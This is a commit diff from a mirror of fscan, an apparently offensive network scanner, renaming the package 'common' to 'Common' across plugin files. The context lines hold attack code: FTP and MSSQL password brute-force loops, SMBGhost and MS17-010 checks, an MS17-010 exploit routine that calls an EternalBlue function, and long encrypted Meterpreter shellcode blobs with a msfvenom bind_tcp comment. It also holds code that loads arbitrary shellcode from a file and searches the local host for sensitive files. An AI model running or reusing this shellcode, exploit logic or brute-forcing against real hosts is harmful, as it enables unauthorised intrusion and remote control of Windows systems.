mirrors/fscan
1
0
Fork 0
mirror of https://github.com/shadow1ng/fscan.git synced 2025-07-14 05:12:36 +08:00
Code Issues Actions Packages Projects Releases Wiki Activity

refactor: 规范化文件命名

Browse Source
This commit is contained in:
ZacharyZcR 2024-12-18 22:00:18 +08:00
parent ab14b15864
commit 5d9bcaaadc
42 changed files with 334 additions and 334 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
common/Parse.go → Common/Parse.go
View File

@ -1,4 +1,4 @@
package common package Common
import ( import (
"bufio" "bufio"

2
common/ParseIP.go → Common/ParseIP.go
View File

@ -1,4 +1,4 @@
package common package Common
import ( import (
"bufio" "bufio"

2
common/ParsePort.go → Common/ParsePort.go
View File

@ -1,4 +1,4 @@
package common package Common
import ( import (
"strconv" "strconv"

10
Plugins/CVE-2020-0796.go
View File

@ -6,7 +6,7 @@ import (
"github.com/shadow1ng/fscan/Config" "github.com/shadow1ng/fscan/Config"
"time" "time"
"github.com/shadow1ng/fscan/common" "github.com/shadow1ng/fscan/Common"
) )
const ( const (
@ -96,7 +96,7 @@ const (
) )
func SmbGhost(info *Config.HostInfo) error { func SmbGhost(info *Config.HostInfo) error {
if common.IsBrute { if Common.IsBrute {
return nil return nil
} }
err := SmbGhostScan(info) err := SmbGhostScan(info)
@ -104,9 +104,9 @@ func SmbGhost(info *Config.HostInfo) error {
} }
func SmbGhostScan(info *Config.HostInfo) error { func SmbGhostScan(info *Config.HostInfo) error {
ip, port, timeout := info.Host, 445, time.Duration(common.Timeout)*time.Second ip, port, timeout := info.Host, 445, time.Duration(Common.Timeout)*time.Second
addr := fmt.Sprintf("%s:%v", info.Host, port) addr := fmt.Sprintf("%s:%v", info.Host, port)
conn, err := common.WrapperTcpWithTimeout("tcp", addr, timeout) conn, err := Common.WrapperTcpWithTimeout("tcp", addr, timeout)
if err != nil { if err != nil {
return err return err
} }
@ -123,7 +123,7 @@ func SmbGhostScan(info *Config.HostInfo) error {
} }
if bytes.Contains(buff[:n], []byte("Public")) == true && len(buff[:n]) >= 76 && bytes.Equal(buff[72:74], []byte{0x11, 0x03}) && bytes.Equal(buff[74:76], []byte{0x02, 0x00}) { if bytes.Contains(buff[:n], []byte("Public")) == true && len(buff[:n]) >= 76 && bytes.Equal(buff[72:74], []byte{0x11, 0x03}) && bytes.Equal(buff[74:76], []byte{0x02, 0x00}) {
result := fmt.Sprintf("[+] %v CVE-2020-0796 SmbGhost Vulnerable", ip) result := fmt.Sprintf("[+] %v CVE-2020-0796 SmbGhost Vulnerable", ip)
common.LogSuccess(result) Common.LogSuccess(result)
} }
return err return err
} }

22
Plugins/ftp.go → Plugins/FTP.go
View File

@ -3,14 +3,14 @@ package Plugins
import ( import (
"fmt" "fmt"
"github.com/jlaffaye/ftp" "github.com/jlaffaye/ftp"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config" "github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"strings" "strings"
"time" "time"
) )
func FtpScan(info *Config.HostInfo) (tmperr error) { func FtpScan(info *Config.HostInfo) (tmperr error) {
if common.IsBrute { if Common.IsBrute {
return return
} }
starttime := time.Now().Unix() starttime := time.Now().Unix()
@ -19,27 +19,27 @@ func FtpScan(info *Config.HostInfo) (tmperr error) {
return err return err
} else { } else {
errlog := fmt.Sprintf("[-] ftp %v:%v %v %v", info.Host, info.Ports, "anonymous", err) errlog := fmt.Sprintf("[-] ftp %v:%v %v %v", info.Host, info.Ports, "anonymous", err)
common.LogError(errlog) Common.LogError(errlog)
tmperr = err tmperr = err
if common.CheckErrs(err) { if Common.CheckErrs(err) {
return err return err
} }
} }
for _, user := range common.Userdict["ftp"] { for _, user := range Common.Userdict["ftp"] {
for _, pass := range common.Passwords { for _, pass := range Common.Passwords {
pass = strings.Replace(pass, "{user}", user, -1) pass = strings.Replace(pass, "{user}", user, -1)
flag, err := FtpConn(info, user, pass) flag, err := FtpConn(info, user, pass)
if flag && err == nil { if flag && err == nil {
return err return err
} else { } else {
errlog := fmt.Sprintf("[-] ftp %v:%v %v %v %v", info.Host, info.Ports, user, pass, err) errlog := fmt.Sprintf("[-] ftp %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
common.LogError(errlog) Common.LogError(errlog)
tmperr = err tmperr = err
if common.CheckErrs(err) { if Common.CheckErrs(err) {
return err return err
} }
if time.Now().Unix()-starttime > (int64(len(common.Userdict["ftp"])*len(common.Passwords)) * common.Timeout) { if time.Now().Unix()-starttime > (int64(len(Common.Userdict["ftp"])*len(Common.Passwords)) * Common.Timeout) {
return err return err
} }
} }
@ -51,7 +51,7 @@ func FtpScan(info *Config.HostInfo) (tmperr error) {
func FtpConn(info *Config.HostInfo, user string, pass string) (flag bool, err error) { func FtpConn(info *Config.HostInfo, user string, pass string) (flag bool, err error) {
flag = false flag = false
Host, Port, Username, Password := info.Host, info.Ports, user, pass Host, Port, Username, Password := info.Host, info.Ports, user, pass
conn, err := ftp.DialTimeout(fmt.Sprintf("%v:%v", Host, Port), time.Duration(common.Timeout)*time.Second) conn, err := ftp.DialTimeout(fmt.Sprintf("%v:%v", Host, Port), time.Duration(Common.Timeout)*time.Second)
if err == nil { if err == nil {
err = conn.Login(Username, Password) err = conn.Login(Username, Password)
if err == nil { if err == nil {
@ -73,7 +73,7 @@ func FtpConn(info *Config.HostInfo, user string, pass string) (flag bool, err er
} }
} }
} }
common.LogSuccess(result) Common.LogSuccess(result)
} }
} }
return flag, err return flag, err

8
Plugins/findnet.go → Plugins/FindNet.go
View File

@ -4,8 +4,8 @@ import (
"bytes" "bytes"
"encoding/hex" "encoding/hex"
"fmt" "fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config" "github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"strconv" "strconv"
"strings" "strings"
"time" "time"
@ -24,12 +24,12 @@ func Findnet(info *Config.HostInfo) error {
func FindnetScan(info *Config.HostInfo) error { func FindnetScan(info *Config.HostInfo) error {
realhost := fmt.Sprintf("%s:%v", info.Host, 135) realhost := fmt.Sprintf("%s:%v", info.Host, 135)
conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second) conn, err := Common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(Common.Timeout)*time.Second)
if err != nil { if err != nil {
return err return err
} }
defer conn.Close() defer conn.Close()
err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second)) err = conn.SetDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second))
if err != nil { if err != nil {
return err return err
} }
@ -119,6 +119,6 @@ func read(text []byte, host string) error {
} }
result += "\n [->]" + string(host) result += "\n [->]" + string(host)
} }
common.LogSuccess(result) Common.LogSuccess(result)
return nil return nil
} }

16
Plugins/icmp.go → Plugins/ICMP.go
View File

@ -3,7 +3,7 @@ package Plugins
import ( import (
"bytes" "bytes"
"fmt" "fmt"
"github.com/shadow1ng/fscan/common" "github.com/shadow1ng/fscan/Common"
"golang.org/x/net/icmp" "golang.org/x/net/icmp"
"net" "net"
"os/exec" "os/exec"
@ -25,7 +25,7 @@ func CheckLive(hostslist []string, Ping bool) []string {
for ip := range chanHosts { for ip := range chanHosts {
if _, ok := ExistHosts[ip]; !ok && IsContain(hostslist, ip) { if _, ok := ExistHosts[ip]; !ok && IsContain(hostslist, ip) {
ExistHosts[ip] = struct{}{} ExistHosts[ip] = struct{}{}
if common.Silent == false { if Common.Silent == false {
if Ping == false { if Ping == false {
fmt.Printf("(icmp) Target %-15s is alive\n", ip) fmt.Printf("(icmp) Target %-15s is alive\n", ip)
} else { } else {
@ -47,7 +47,7 @@ func CheckLive(hostslist []string, Ping bool) []string {
if err == nil { if err == nil {
RunIcmp1(hostslist, conn, chanHosts) RunIcmp1(hostslist, conn, chanHosts)
} else { } else {
common.LogError(err) Common.LogError(err)
//尝试无监听icmp探测 //尝试无监听icmp探测
fmt.Println("trying RunIcmp2") fmt.Println("trying RunIcmp2")
conn, err := net.DialTimeout("ip4:icmp", "127.0.0.1", 3*time.Second) conn, err := net.DialTimeout("ip4:icmp", "127.0.0.1", 3*time.Second)
@ -59,7 +59,7 @@ func CheckLive(hostslist []string, Ping bool) []string {
if err == nil { if err == nil {
RunIcmp2(hostslist, chanHosts) RunIcmp2(hostslist, chanHosts)
} else { } else {
common.LogError(err) Common.LogError(err)
//使用ping探测 //使用ping探测
fmt.Println("The current user permissions unable to send icmp packets") fmt.Println("The current user permissions unable to send icmp packets")
fmt.Println("start ping") fmt.Println("start ping")
@ -72,17 +72,17 @@ func CheckLive(hostslist []string, Ping bool) []string {
close(chanHosts) close(chanHosts)
if len(hostslist) > 1000 { if len(hostslist) > 1000 {
arrTop, arrLen := ArrayCountValueTop(AliveHosts, common.LiveTop, true) arrTop, arrLen := ArrayCountValueTop(AliveHosts, Common.LiveTop, true)
for i := 0; i < len(arrTop); i++ { for i := 0; i < len(arrTop); i++ {
output := fmt.Sprintf("[*] LiveTop %-16s 段存活数量为: %d", arrTop[i]+".0.0/16", arrLen[i]) output := fmt.Sprintf("[*] LiveTop %-16s 段存活数量为: %d", arrTop[i]+".0.0/16", arrLen[i])
common.LogSuccess(output) Common.LogSuccess(output)
} }
} }
if len(hostslist) > 256 { if len(hostslist) > 256 {
arrTop, arrLen := ArrayCountValueTop(AliveHosts, common.LiveTop, false) arrTop, arrLen := ArrayCountValueTop(AliveHosts, Common.LiveTop, false)
for i := 0; i < len(arrTop); i++ { for i := 0; i < len(arrTop); i++ {
output := fmt.Sprintf("[*] LiveTop %-16s 段存活数量为: %d", arrTop[i]+".0/24", arrLen[i]) output := fmt.Sprintf("[*] LiveTop %-16s 段存活数量为: %d", arrTop[i]+".0/24", arrLen[i])
common.LogSuccess(output) Common.LogSuccess(output)
} }
} }

8
Plugins/localinfo.go → Plugins/LocalInfo.go
View File

@ -2,8 +2,8 @@ package Plugins
import ( import (
"fmt" "fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config" "github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"os" "os"
"path/filepath" "path/filepath"
"runtime" "runtime"
@ -93,7 +93,7 @@ func LocalInfoScan(info *Config.HostInfo) (err error) {
home, err := os.UserHomeDir() home, err := os.UserHomeDir()
if err != nil { if err != nil {
errlog := fmt.Sprintf("[-] Get UserHomeDir error: %v", err) errlog := fmt.Sprintf("[-] Get UserHomeDir error: %v", err)
common.LogError(errlog) Common.LogError(errlog)
return err return err
} }
@ -148,7 +148,7 @@ func scanFixedLocations(home string) {
func checkAndLogFile(path string) { func checkAndLogFile(path string) {
if _, err := os.Stat(path); err == nil { if _, err := os.Stat(path); err == nil {
result := fmt.Sprintf("[+] Found sensitive file: %s", path) result := fmt.Sprintf("[+] Found sensitive file: %s", path)
common.LogSuccess(result) Common.LogSuccess(result)
} }
} }
@ -202,7 +202,7 @@ func searchSensitiveFiles() {
fileName := strings.ToLower(info.Name()) fileName := strings.ToLower(info.Name())
if strings.Contains(fileName, white) { if strings.Contains(fileName, white) {
result := fmt.Sprintf("[+] Found potential sensitive file: %s", path) result := fmt.Sprintf("[+] Found potential sensitive file: %s", path)
common.LogSuccess(result) Common.LogSuccess(result)
break break
} }
} }

20
Plugins/ms17010-exp.go → Plugins/MS17010-Exp.go
View File

@ -5,8 +5,8 @@ import (
"encoding/binary" "encoding/binary"
"encoding/hex" "encoding/hex"
"fmt" "fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config" "github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"io" "io"
"io/ioutil" "io/ioutil"
"net" "net"
@ -17,7 +17,7 @@ import (
func MS17010EXP(info *Config.HostInfo) { func MS17010EXP(info *Config.HostInfo) {
address := info.Host + ":445" address := info.Host + ":445"
var sc string var sc string
switch common.SC { switch Common.SC {
case "bind": case "bind":
//msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=64531 -f hex //msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=64531 -f hex
sc_enc := "gUYe7vm5/MQzTkSyKvpMFImS/YtwI+HxNUDd7MeUKDIxBZ8nsaUtdMEXIZmlZUfoQacylFEZpu7iWBRpQZw0KElIFkZR9rl4fpjyYNhEbf9JdquRrvw4hYMypBbfDQ6MN8csp1QF5rkMEs6HvtlKlGSaff34Msw6RlvEodROjGYA+mHUYvUTtfccymIqiU7hCFn+oaIk4ZtCS0Mzb1S5K5+U6vy3e5BEejJVA6u6I+EUb4AOSVVF8GpCNA91jWD1AuKcxg0qsMa+ohCWkWsOxh1zH0kwBPcWHAdHIs31g26NkF14Wl+DHStsW4DuNaxRbvP6awn+wD5aY/1QWlfwUeH/I+rkEPF18sTZa6Hr4mrDPT7eqh4UrcTicL/x4EgovNXA9X+mV6u1/4Zb5wy9rOVwJ+agXxfIqwL5r7R68BEPA/fLpx4LgvTwhvytO3w6I+7sZS7HekuKayBLNZ0T4XXeM8GpWA3h7zkHWjTm41/5JqWblQ45Msrg+XqD6WGvGDMnVZ7jE3xWIRBR7MrPAQ0Kl+Nd93/b+BEMwvuinXp1viSxEoZHIgJZDYR5DykQLpexasSpd8/WcuoQQtuTTYsJpHFfvqiwn0djgvQf3yk3Ro1EzjbR7a8UzwyaCqtKkCu9qGb+0m8JSpYS8DsjbkVST5Y7ZHtegXlX1d/FxgweavKGz3UiHjmbQ+FKkFF82Lkkg+9sO3LMxp2APvYz2rv8RM0ujcPmkN2wXE03sqcTfDdjCWjJ/evdrKBRzwPFhjOjUX1SBVsAcXzcvpJbAf3lcPPxOXM060OYdemu4Hou3oECjKP2h6W9GyPojMuykTkcoIqgN5Ldx6WpGhhE9wrfijOrrm7of9HmO568AsKRKBPfy/QpCfxTrY+rEwyzFmU1xZ2lkjt+FTnsMJY8YM7sIbWZauZ2S+Ux33RWDf7YUmSGlWC8djqDKammk3GgkSPHjf0Qgknukptxl977s2zw4jdh8bUuW5ap7T+Wd/S0ka90CVF4AyhonvAQoi0G1qj5gTih1FPTjBpf+FrmNJvNIAcx2oBoU4y48c8Sf4ABtpdyYewUh4NdxUoL7RSVouU1MZTnYS9BqOJWLMnvV7pwRmHgUz3fe7Kx5PGnP/0zQjW/P/vgmLMh/iBisJIGF3JDGoULsC3dabGE5L7sXuCNePiOEJmgwOHlFBlwqddNaE+ufor0q4AkQBI9XeqznUfdJg2M2LkUZOYrbCjQaE7Ytsr3WJSXkNbOORzqKo5wIf81z1TCow8QuwlfwIanWs+e8oTavmObV3gLPoaWqAIUzJqwD9O4P6x1176D0Xj83n6G4GrJgHpgMuB0qdlK" sc_enc := "gUYe7vm5/MQzTkSyKvpMFImS/YtwI+HxNUDd7MeUKDIxBZ8nsaUtdMEXIZmlZUfoQacylFEZpu7iWBRpQZw0KElIFkZR9rl4fpjyYNhEbf9JdquRrvw4hYMypBbfDQ6MN8csp1QF5rkMEs6HvtlKlGSaff34Msw6RlvEodROjGYA+mHUYvUTtfccymIqiU7hCFn+oaIk4ZtCS0Mzb1S5K5+U6vy3e5BEejJVA6u6I+EUb4AOSVVF8GpCNA91jWD1AuKcxg0qsMa+ohCWkWsOxh1zH0kwBPcWHAdHIs31g26NkF14Wl+DHStsW4DuNaxRbvP6awn+wD5aY/1QWlfwUeH/I+rkEPF18sTZa6Hr4mrDPT7eqh4UrcTicL/x4EgovNXA9X+mV6u1/4Zb5wy9rOVwJ+agXxfIqwL5r7R68BEPA/fLpx4LgvTwhvytO3w6I+7sZS7HekuKayBLNZ0T4XXeM8GpWA3h7zkHWjTm41/5JqWblQ45Msrg+XqD6WGvGDMnVZ7jE3xWIRBR7MrPAQ0Kl+Nd93/b+BEMwvuinXp1viSxEoZHIgJZDYR5DykQLpexasSpd8/WcuoQQtuTTYsJpHFfvqiwn0djgvQf3yk3Ro1EzjbR7a8UzwyaCqtKkCu9qGb+0m8JSpYS8DsjbkVST5Y7ZHtegXlX1d/FxgweavKGz3UiHjmbQ+FKkFF82Lkkg+9sO3LMxp2APvYz2rv8RM0ujcPmkN2wXE03sqcTfDdjCWjJ/evdrKBRzwPFhjOjUX1SBVsAcXzcvpJbAf3lcPPxOXM060OYdemu4Hou3oECjKP2h6W9GyPojMuykTkcoIqgN5Ldx6WpGhhE9wrfijOrrm7of9HmO568AsKRKBPfy/QpCfxTrY+rEwyzFmU1xZ2lkjt+FTnsMJY8YM7sIbWZauZ2S+Ux33RWDf7YUmSGlWC8djqDKammk3GgkSPHjf0Qgknukptxl977s2zw4jdh8bUuW5ap7T+Wd/S0ka90CVF4AyhonvAQoi0G1qj5gTih1FPTjBpf+FrmNJvNIAcx2oBoU4y48c8Sf4ABtpdyYewUh4NdxUoL7RSVouU1MZTnYS9BqOJWLMnvV7pwRmHgUz3fe7Kx5PGnP/0zQjW/P/vgmLMh/iBisJIGF3JDGoULsC3dabGE5L7sXuCNePiOEJmgwOHlFBlwqddNaE+ufor0q4AkQBI9XeqznUfdJg2M2LkUZOYrbCjQaE7Ytsr3WJSXkNbOORzqKo5wIf81z1TCow8QuwlfwIanWs+e8oTavmObV3gLPoaWqAIUzJqwD9O4P6x1176D0Xj83n6G4GrJgHpgMuB0qdlK"
@ -34,16 +34,16 @@ func MS17010EXP(info *Config.HostInfo) {
sc_enc := "Teobs46+kgUn45BOBbruUdpBFXs8uKXWtvYoNbWtKpNCtOasHB/5Er+C2ZlALluOBkUC6BQVZHO1rKzuygxJ3n2PkeutispxSzGcvFS3QJ1EU517e2qOL7W2sRDlNb6rm+ECA2vQZkTZBAboolhGfZYeM6v5fEB2L1Ej6pWF5CKSYxjztdPF8bNGAkZsQhUAVW7WVKysZ1vbghszGyeKFQBvO9Hiinq/XiUrLBqvwXLsJaybZA44wUFvXC0FA9CZDOSD3MCX2arK6Mhk0Q+6dAR+NWPCQ34cYVePT98GyXnYapTOKokV6+hsqHMjfetjkvjEFohNrD/5HY+E73ihs9TqS1ZfpBvZvnWSOjLUA+Z3ex0j0CIUONCjHWpoWiXAsQI/ryJh7Ho5MmmGIiRWyV3l8Q0+1vFt3q/zQGjSI7Z7YgDdIBG8qcmfATJz6dx7eBS4Ntl+4CCqN8Dh4pKM3rV+hFqQyKnBHI5uJCn6qYky7p305KK2Z9Ga5nAqNgaz0gr2GS7nA5D/Cd8pvUH6sd2UmN+n4HnK6/O5hzTmXG/Pcpq7MTEy9G8uXRfPUQdrbYFP7Ll1SWy35B4n/eCf8swaTwi1mJEAbPr0IeYgf8UiOBKS/bXkFsnUKrE7wwG8xXaI7bHFgpdTWfdFRWc8jaJTvwK2HUK5u+4rWWtf0onGxTUyTilxgRFvb4AjVYH0xkr8mIq8smpsBN3ff0TcWYfnI2L/X1wJoCH+oLi67xMN+yPDirT+LXfLOaGlyTqG6Yojge8Mti/BqIg5RpG4wIZPKxX9rPbMP+Tzw8rpi/9b33eq0YDevzqaj5Uo0HudOmaPwv5cd9/dqWgeC7FJwv73TckogZGbDOASSoLK26AgBat8vCrhrd7T0uBrEk+1x/NXvl5r2aEeWCWBsULKxFh2WDCqyQntSaAUkPe3JKJe0HU6inDeS4d52BagSqmd1meY0Rb/97fMCXaAMLekq+YrwcSrmPKBY9Yk0m1kAzY+oP4nvV/OhCHNXAsUQGH85G7k65I1QnzffroaKxloP26XJPW0JEq9vCSQFI/EX56qt323V/solearWdBVptG0+k55TBd0dxmBsqRMGO3Z23OcmQR4d8zycQUqqavMmo32fy4rjY6Ln5QUR0JrgJ67dqDhnJn5TcT4YFHgF4gY8oynT3sqv0a+hdVeF6XzsElUUsDGfxOLfkn3RW/2oNnqAHC2uXwX2ZZNrSbPymB2zxB/ET3SLlw3skBF1A82ZBYqkMIuzs6wr9S9ox9minLpGCBeTR9j6OYk6mmKZnThpvarRec8a7YBuT2miU7fO8iXjhS95A84Ub++uS4nC1Pv1v9nfj0/T8scD2BUYoVKCJX3KiVnxUYKVvDcbvv8UwrM6+W/hmNOePHJNx9nX1brHr90m9e40as1BZm2meUmCECxQd+Hdqs7HgPsPLcUB8AL8wCHQjziU6R4XKuX6ivx" sc_enc := "Teobs46+kgUn45BOBbruUdpBFXs8uKXWtvYoNbWtKpNCtOasHB/5Er+C2ZlALluOBkUC6BQVZHO1rKzuygxJ3n2PkeutispxSzGcvFS3QJ1EU517e2qOL7W2sRDlNb6rm+ECA2vQZkTZBAboolhGfZYeM6v5fEB2L1Ej6pWF5CKSYxjztdPF8bNGAkZsQhUAVW7WVKysZ1vbghszGyeKFQBvO9Hiinq/XiUrLBqvwXLsJaybZA44wUFvXC0FA9CZDOSD3MCX2arK6Mhk0Q+6dAR+NWPCQ34cYVePT98GyXnYapTOKokV6+hsqHMjfetjkvjEFohNrD/5HY+E73ihs9TqS1ZfpBvZvnWSOjLUA+Z3ex0j0CIUONCjHWpoWiXAsQI/ryJh7Ho5MmmGIiRWyV3l8Q0+1vFt3q/zQGjSI7Z7YgDdIBG8qcmfATJz6dx7eBS4Ntl+4CCqN8Dh4pKM3rV+hFqQyKnBHI5uJCn6qYky7p305KK2Z9Ga5nAqNgaz0gr2GS7nA5D/Cd8pvUH6sd2UmN+n4HnK6/O5hzTmXG/Pcpq7MTEy9G8uXRfPUQdrbYFP7Ll1SWy35B4n/eCf8swaTwi1mJEAbPr0IeYgf8UiOBKS/bXkFsnUKrE7wwG8xXaI7bHFgpdTWfdFRWc8jaJTvwK2HUK5u+4rWWtf0onGxTUyTilxgRFvb4AjVYH0xkr8mIq8smpsBN3ff0TcWYfnI2L/X1wJoCH+oLi67xMN+yPDirT+LXfLOaGlyTqG6Yojge8Mti/BqIg5RpG4wIZPKxX9rPbMP+Tzw8rpi/9b33eq0YDevzqaj5Uo0HudOmaPwv5cd9/dqWgeC7FJwv73TckogZGbDOASSoLK26AgBat8vCrhrd7T0uBrEk+1x/NXvl5r2aEeWCWBsULKxFh2WDCqyQntSaAUkPe3JKJe0HU6inDeS4d52BagSqmd1meY0Rb/97fMCXaAMLekq+YrwcSrmPKBY9Yk0m1kAzY+oP4nvV/OhCHNXAsUQGH85G7k65I1QnzffroaKxloP26XJPW0JEq9vCSQFI/EX56qt323V/solearWdBVptG0+k55TBd0dxmBsqRMGO3Z23OcmQR4d8zycQUqqavMmo32fy4rjY6Ln5QUR0JrgJ67dqDhnJn5TcT4YFHgF4gY8oynT3sqv0a+hdVeF6XzsElUUsDGfxOLfkn3RW/2oNnqAHC2uXwX2ZZNrSbPymB2zxB/ET3SLlw3skBF1A82ZBYqkMIuzs6wr9S9ox9minLpGCBeTR9j6OYk6mmKZnThpvarRec8a7YBuT2miU7fO8iXjhS95A84Ub++uS4nC1Pv1v9nfj0/T8scD2BUYoVKCJX3KiVnxUYKVvDcbvv8UwrM6+W/hmNOePHJNx9nX1brHr90m9e40as1BZm2meUmCECxQd+Hdqs7HgPsPLcUB8AL8wCHQjziU6R4XKuX6ivx"
sc = AesDecrypt(sc_enc, key) sc = AesDecrypt(sc_enc, key)
default: default:
if strings.Contains(common.SC, "file:") { if strings.Contains(Common.SC, "file:") {
read, err := ioutil.ReadFile(common.SC[5:]) read, err := ioutil.ReadFile(Common.SC[5:])
if err != nil { if err != nil {
errlog := fmt.Sprintf("[-] ms17010 sc readfile %v error: %v", common.SC, err) errlog := fmt.Sprintf("[-] ms17010 sc readfile %v error: %v", Common.SC, err)
common.LogError(errlog) Common.LogError(errlog)
return return
} }
sc = fmt.Sprintf("%x", read) sc = fmt.Sprintf("%x", read)
} else { } else {
sc = common.SC sc = Common.SC
} }
} }
@ -54,15 +54,15 @@ func MS17010EXP(info *Config.HostInfo) {
sc1, err := hex.DecodeString(sc) sc1, err := hex.DecodeString(sc)
if err != nil { if err != nil {
common.LogError("[-] " + info.Host + " MS17-010 shellcode decode error " + err.Error()) Common.LogError("[-] " + info.Host + " MS17-010 shellcode decode error " + err.Error())
return return
} }
err = eternalBlue(address, 12, 12, sc1) err = eternalBlue(address, 12, 12, sc1)
if err != nil { if err != nil {
common.LogError("[-] " + info.Host + " MS17-010 exp failed " + err.Error()) Common.LogError("[-] " + info.Host + " MS17-010 exp failed " + err.Error())
return return
} }
common.LogSuccess("[*] " + info.Host + "\tMS17-010\texploit end") Common.LogSuccess("[*] " + info.Host + "\tMS17-010\texploit end")
} }
func eternalBlue(address string, initialGrooms, maxAttempts int, sc []byte) error { func eternalBlue(address string, initialGrooms, maxAttempts int, sc []byte) error {

18
Plugins/ms17010.go → Plugins/MS17010.go
View File

@ -5,8 +5,8 @@ import (
"encoding/hex" "encoding/hex"
"errors" "errors"
"fmt" "fmt"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config" "github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"strings" "strings"
"time" "time"
) )
@ -25,13 +25,13 @@ var (
) )
func MS17010(info *Config.HostInfo) error { func MS17010(info *Config.HostInfo) error {
if common.IsBrute { if Common.IsBrute {
return nil return nil
} }
err := MS17010Scan(info) err := MS17010Scan(info)
if err != nil { if err != nil {
errlog := fmt.Sprintf("[-] Ms17010 %v %v", info.Host, err) errlog := fmt.Sprintf("[-] Ms17010 %v %v", info.Host, err)
common.LogError(errlog) Common.LogError(errlog)
} }
return err return err
} }
@ -39,13 +39,13 @@ func MS17010(info *Config.HostInfo) error {
func MS17010Scan(info *Config.HostInfo) error { func MS17010Scan(info *Config.HostInfo) error {
ip := info.Host ip := info.Host
// connecting to a host in LAN if reachable should be very quick // connecting to a host in LAN if reachable should be very quick
conn, err := common.WrapperTcpWithTimeout("tcp", ip+":445", time.Duration(common.Timeout)*time.Second) conn, err := Common.WrapperTcpWithTimeout("tcp", ip+":445", time.Duration(Common.Timeout)*time.Second)
if err != nil { if err != nil {
//fmt.Printf("failed to connect to %s\n", ip) //fmt.Printf("failed to connect to %s\n", ip)
return err return err
} }
defer conn.Close() defer conn.Close()
err = conn.SetDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second)) err = conn.SetDeadline(time.Now().Add(time.Duration(Common.Timeout) * time.Second))
if err != nil { if err != nil {
//fmt.Printf("failed to connect to %s\n", ip) //fmt.Printf("failed to connect to %s\n", ip)
return err return err
@ -132,9 +132,9 @@ func MS17010Scan(info *Config.HostInfo) error {
//if runtime.GOOS=="windows" {fmt.Printf("%s\tMS17-010\t(%s)\n", ip, os) //if runtime.GOOS=="windows" {fmt.Printf("%s\tMS17-010\t(%s)\n", ip, os)
//} else{fmt.Printf("\033[33m%s\tMS17-010\t(%s)\033[0m\n", ip, os)} //} else{fmt.Printf("\033[33m%s\tMS17-010\t(%s)\033[0m\n", ip, os)}
result := fmt.Sprintf("[+] MS17-010 %s\t(%s)", ip, os) result := fmt.Sprintf("[+] MS17-010 %s\t(%s)", ip, os)
common.LogSuccess(result) Common.LogSuccess(result)
defer func() { defer func() {
if common.SC != "" { if Common.SC != "" {
MS17010EXP(info) MS17010EXP(info)
} }
}() }()
@ -154,12 +154,12 @@ func MS17010Scan(info *Config.HostInfo) error {
if reply[34] == 0x51 { if reply[34] == 0x51 {
result := fmt.Sprintf("[+] MS17-010 %s has DOUBLEPULSAR SMB IMPLANT", ip) result := fmt.Sprintf("[+] MS17-010 %s has DOUBLEPULSAR SMB IMPLANT", ip)
common.LogSuccess(result) Common.LogSuccess(result)
} }
} else { } else {
result := fmt.Sprintf("[*] OsInfo %s\t(%s)", ip, os) result := fmt.Sprintf("[*] OsInfo %s\t(%s)", ip, os)
common.LogSuccess(result) Common.LogSuccess(result)
} }
return err return err

22
Plugins/mssql.go → Plugins/MSSQL.go
View File

@ -4,31 +4,31 @@ import (
"database/sql" "database/sql"
"fmt" "fmt"
_ "github.com/denisenkom/go-mssqldb" _ "github.com/denisenkom/go-mssqldb"
"github.com/shadow1ng/fscan/Common"
"github.com/shadow1ng/fscan/Config" "github.com/shadow1ng/fscan/Config"
"github.com/shadow1ng/fscan/common"
"strings" "strings"
"time" "time"
) )
func MssqlScan(info *Config.HostInfo) (tmperr error) { func MssqlScan(info *Config.HostInfo) (tmperr error) {
if common.IsBrute { if Common.IsBrute {
return return
} }
starttime := time.Now().Unix() starttime := time.Now().Unix()
for _, user := range common.Userdict["mssql"] { for _, user := range Common.Userdict["mssql"] {
for _, pass := range common.Passwords { for _, pass := range Common.Passwords {
pass = strings.Replace(pass, "{user}", user, -1) pass = strings.Replace(pass, "{user}", user, -1)
flag, err := MssqlConn(info, user, pass) flag, err := MssqlConn(info, user, pass)
if flag == true && err == nil { if flag == true && err == nil {
return err return err
} else { } else {
errlog := fmt.Sprintf("[-] mssql %v:%v %v %v %v", info.Host, info.Ports, user, pass, err) errlog := fmt.Sprintf("[-] mssql %v:%v %v %v %v", info.Host, info.Ports, user, pass, err)
common.LogError(errlog) Common.LogError(errlog)
tmperr = err tmperr = err
if common.CheckErrs(err) { if Common.CheckErrs(err) {
return err return err
} }
if time.Now().Unix()-starttime > (int64(len(common.Userdict["mssql"])*len(common.Passwords)) * common.Timeout) { if time.Now().Unix()-starttime > (int64(len(Common.Userdict["mssql"])*len(Common.Passwords)) * Common.Timeout) {
return err return err
} }
} }
@ -40,17 +40,17 @@ func MssqlScan(info *Config.HostInfo) (tmperr error) {
func MssqlConn(info *Config.HostInfo, user string, pass string) (flag bool, err error) { func MssqlConn(info *Config.HostInfo, user string, pass string) (flag bool, err error) {
flag = false flag = false
Host, Port, Username, Password := info.Host, info.Ports, user, pass Host, Port, Username, Password := info.Host, info.Ports, user, pass
